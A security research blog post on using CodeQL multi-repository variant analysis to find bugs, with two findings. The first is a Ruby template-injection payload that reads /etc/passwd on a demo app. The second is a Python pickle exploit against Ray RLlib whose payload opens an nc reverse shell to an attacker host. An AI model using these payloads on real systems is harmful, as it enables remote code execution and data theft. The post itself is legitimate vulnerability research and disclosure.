Finding Vulnerabilities with MRVA CodeQL
1- What is MRVA?
Everyone knows the power of CodeQL for analyzing a single repository with one click, but MRVA gives security researchers a new way to perform security research across GitHub.
With MRVA (multi-repository variant analysis), researchers can run a query against the top 1000 GitHub repositories at once, which greatly improves their ability to uncover security issues across a broad range of projects.
It gets even more interesting when combined with other tools such as GitHub Code Search to build a more specific list of repositories to analyze (e.g. if we’re running a Ruby SSTI query, we’re only interested in repositories that use ERB or Slim), or when we run a query we developed ourselves: being the first to run it raises the chances of finding something interesting.
2- MRVA vs CodeQL suites
So what’s the difference between MRVA and CodeQL suites?
MRVA is a CodeQL feature that runs a query across a large number of repositories, so the better question is when to use CodeQL on a single repository and when to use MRVA on up to 1000. If we want to find vulnerabilities in one specific repository, CodeQL suites are the ideal solution. A suite lets us run a list of queries covering different vulnerability classes, which gives us a much better chance of finding something in that repository.
CodeQL
But if CodeQL suites give us better vulnerability coverage, what’s the point of using MRVA? MRVA lets us run a single query against many repositories, so we can hunt for one type of vulnerability in many places at once, which CodeQL suites cannot do. This is especially useful for anyone developing custom queries, since it saves a lot of time.
MRVA
3- How to set up MRVA
3.1 - Download CodeQL extension in VSCode
First of all, we have to install the CodeQL extension for Visual Studio Code, version 1.8.0 or later.
3.2 - Configure our GitHub controller
Now we go to GitHub and create a repository named controller (although any name works), remembering to make at least one commit. We do this because MRVA uses GitHub Actions to run CodeQL queries against databases that are already created and stored on GitHub (imagine having to create a thousand databases for a thousand projects, it would take forever; GitHub already does the work for us 😎).
Once the controller is ready, we have to edit the settings.json of our CodeQL extension:
Then add the following line for the MRVA controller repository (replace your_username with your GitHub username):
"codeQL.variantAnalysis.controllerRepo": "your_username/controller",
Now we’re ready to run it 😎.
4- Code Search tools
We can use GitHub Code Search to find code snippets of interest. The interesting part here is creating a custom list of repositories that use the methods we are scanning for. This approach goes beyond merely analyzing the top 1000 repositories and lets us focus on the specific projects that are relevant to our research.
Luckily, the GitHub API now supports Code Search (previously it only supported the legacy code search), so we can take advantage of that and build a tool. This is the script I used, here is the repository:
import requests
import re
import urllib.parse
import argparse

token = ""  # your GitHub token goes here
# Matches every repository "full_name" in the raw JSON response
pattern = '(?<="full_name":")([^"]+)'
headers = {
    "Accept": "application/vnd.github+json",
    "Authorization": f"Bearer {token}",
    "X-GitHub-Api-Version": "2022-11-28"
}


def request_api(query):
    results = []
    i = 1
    # Page through the results, 100 per page, until a short page comes back
    while True:
        url = f"https://api.github.com/search/code?q={urllib.parse.quote(query)}&per_page=100&page={i}"
        r = requests.get(url, headers=headers)
        content = re.findall(pattern, r.text)
        results.extend(content)
        i += 1
        if len(content) != 100:
            break
    # Deduplicate: the same repository can match in several files
    return [*set(results)]


def output(filename, content):
    with open(filename, "w") as f:
        f.write(str(content))


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-q', '--query', help='Query', required=True)
    parser.add_argument('-f', '--filename', help='filename', required=True)
    args = parser.parse_args()
    query = args.query
    filename = args.filename
    results = request_api(query)
    output(filename, results)
Remember to add your GitHub token to make it work. This tool builds a custom list of all the repositories that use the code we specify in the query argument.
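The regular expression in the script works on the raw response text. As an alternative, here is a minimal sketch of the same extraction on the parsed JSON. It assumes the documented response shape of the code search endpoint, where each entry in items carries a repository object with a full_name field. The function name extract_repos and the sample payload are illustrative and not part of the original tool.

```python
def extract_repos(payload: dict) -> list[str]:
    """Return the unique repository names in a code search response, sorted."""
    names = {
        item["repository"]["full_name"]
        for item in payload.get("items", [])
    }
    return sorted(names)


# Hypothetical, trimmed-down response used only for illustration.
sample = {
    "total_count": 3,
    "items": [
        {"path": "app/views/a.erb", "repository": {"full_name": "octo/app"}},
        {"path": "app/views/b.erb", "repository": {"full_name": "octo/app"}},
        {"path": "lib/t.slim", "repository": {"full_name": "acme/site"}},
    ],
}

print(extract_repos(sample))
```

In the script above, a function like this would receive r.json() instead of scanning r.text, which avoids depending on how the JSON happens to be serialized.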
That said, Code Search has been available directly in the CodeQL extension for Visual Studio Code since June 23 (GitHub Blog). The configuration is very simple: we just go to the CodeQL extension and create a list (I called it test):
We can even specify the language used:
And finally we specify our query for Code Search. In my case I used maikypedia, so every repository in which the word maikypedia appears will be included in the list:
5- Fishing with MRVA 🎣
5.1- Server Side Template Injection (Ruby)
Let’s move on to the fun part. I have written a query for Server Side Template Injection in Ruby covering ERB and Slim, so let’s try our luck with MRVA!
As with any static analysis tool, we have to take false positives into account; their number depends on the quality of the query. In this case we got 4 results from the top 1000 GitHub repositories. After discarding the false positives we are left with one repository: bootstrap-ruby/bootstrap_form.
Let’s set up the server and check if it is really vulnerable:
bootstrap_form/demo/bin ❯ sudo ./rails s
Now we should have our rails application running on port 3000, but let’s check the code first:
def fragment
  @erb = params[:erb]
  @erb.prepend '<div class="p-3 border">'
  @erb << "</div>"
  load_models
  render inline: @erb, layout: "application" # rubocop: disable Rails/RenderInline
end
This fragment method takes a parameter named erb from the params hash (an HTTP GET parameter) and assigns its value to the instance variable @erb. Some HTML is then prepended and appended to it, and finally it is rendered with render inline:, a method that works like ERB.new(@erb).result.
This method is called when a user visits /fragment, as we can see in the routes.rb file:
Dummy::Application.routes.draw do
  get "fragment" => "bootstrap#fragment", as: :fragment
  resources :users
  root to: "bootstrap#form"
end
So let’s jump to the browser! We can use the following payload to read /etc/passwd and prove the SSTI (don’t forget to URL-encode it):
<%= IO.popen('cat /etc/passwd').readlines() %>
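To avoid URL-encoding the template by hand, a small sketch with Python’s urllib.parse can build the request URL. It assumes the demo app is listening on localhost:3000 as described above and uses a harmless arithmetic probe as an illustrative stand-in for the payload. The helper name build_fragment_url is made up for this example.

```python
from urllib.parse import quote


def build_fragment_url(template: str, base: str = "http://localhost:3000") -> str:
    """Build the /fragment URL with the template percent-encoded in ?erb=."""
    # safe="" makes quote() encode every reserved character, including "/".
    return f"{base}/fragment?erb={quote(template, safe='')}"


# Harmless probe: the page shows 49 if the template is evaluated server side.
print(build_fragment_url("<%= 7 * 7 %>"))
```

The resulting URL can be pasted straight into the browser; any other template string can be passed the same way.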
Nice 😎. But unfortunately, as the file path says, this is a demo application with no real security implications, so even though it is “vulnerable” at the code level, it has no impact.
5.2- Unsafe Deserialization (Python)
I found this while modeling unsafe deserialization sinks for Python, including pandas.read_pickle and others. To my surprise, while running MRVA and waiting for results from my own sinks, I found this:
It was a result with a sink from the original query, and judging by the code snippet it looked like it could be a true positive. The repository is ray-project/ray.
The vulnerability resides in RLlib’s PolicyServerInput class (/ray/python/ray/rllib/env/policy_server_input.py). Specifically, on line 266, the HTTP POST handler deserializes user data using pickle. Using pickle to deserialize data from untrusted sources is dangerous, as it allows the execution of arbitrary code during the deserialization process.
def do_POST(self):
    content_len = int(self.headers.get("Content-Length"), 0)
    raw_body = self.rfile.read(content_len)
    parsed_input = pickle.loads(raw_body)
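To see why this call is risky without running anything harmful, here is a minimal sketch. Probe is a hypothetical stand-in whose __reduce__ makes unpickling call os.getcwd(), a benign function chosen for illustration; an attacker would pick a far less friendly callable. AllowlistUnpickler follows the "restricting globals" approach from the Python pickle documentation and is shown only as one possible mitigation, not as what Ray does.

```python
import io
import os
import pickle


class Probe:
    """Hypothetical stand-in for a malicious object (assumption for this demo)."""

    def __reduce__(self):
        # On load, pickle calls os.getcwd() and returns its result.
        return os.getcwd, ()


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly allowed."""

    ALLOWED = set()  # (module, name) pairs; empty means plain data only

    def find_class(self, module, name):
        # Called for each global (class or function) the pickle refers to.
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    """Like pickle.loads, but goes through the allowlist above."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


blob = pickle.dumps(Probe())

# Plain pickle.loads runs the callable chosen by whoever built the payload.
print(pickle.loads(blob) == os.getcwd())

# The restricted loader still accepts plain data but rejects the probe.
print(safe_loads(pickle.dumps({"obs": [1, 2, 3]})))
try:
    safe_loads(blob)
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

An allowlist like this narrows what a payload can reach, but the pickle documentation still advises against unpickling untrusted data at all, so a data-only format is the safer choice for a network-facing handler.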
The vulnerable class is used in examples such as /ray/rllib/examples/serving/cartpole_server.py (l.101-115):
if __name__ == "__main__":
    args = parser.parse_args()
    ray.init()

    def _input(ioctx):
        if ioctx.worker_index > 0 or ioctx.worker.num_workers == 0:
            return PolicyServerInput(
                ioctx,
                SERVER_ADDRESS,
                args.port + ioctx.worker_index - (1 if ioctx.worker_index > 0 else 0),
            )
Now it’s time for the PoC 😁. Run the example server:
python3 /ray/rllib/examples/serving/cartpole_server.py
And then, send the malicious data to the policy server port:
import requests
import pickle
import os

attacker = "localhost"
attacker_port = "4444"


class RCE:
    def __reduce__(self):
        cmd = (f'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {attacker} {attacker_port} > /tmp/f')
        return os.system, (cmd,)


# Serialize the malicious class
pickled = pickle.dumps(RCE())
# Define the URL to which you want to send the POST request
url = "http://localhost:9900/"
headers = {
    "Content-Type": "application/octet-stream",  # Indicate that we are sending binary data
}
# Send the POST request with the serialized data
requests.post(url, data=pickled, headers=headers)
And as a final step, we run the exploit:
python3 exploit.py
Once again, we fall just short. Still, this shows that MRVA has great potential for finding vulnerable code. The vulnerability was reported to the Ray project, and they stated that this code should only be exposed to trusted parties. Therefore, there hasn’t been a fix, but rather a comment that makes the warning more explicit in this commit.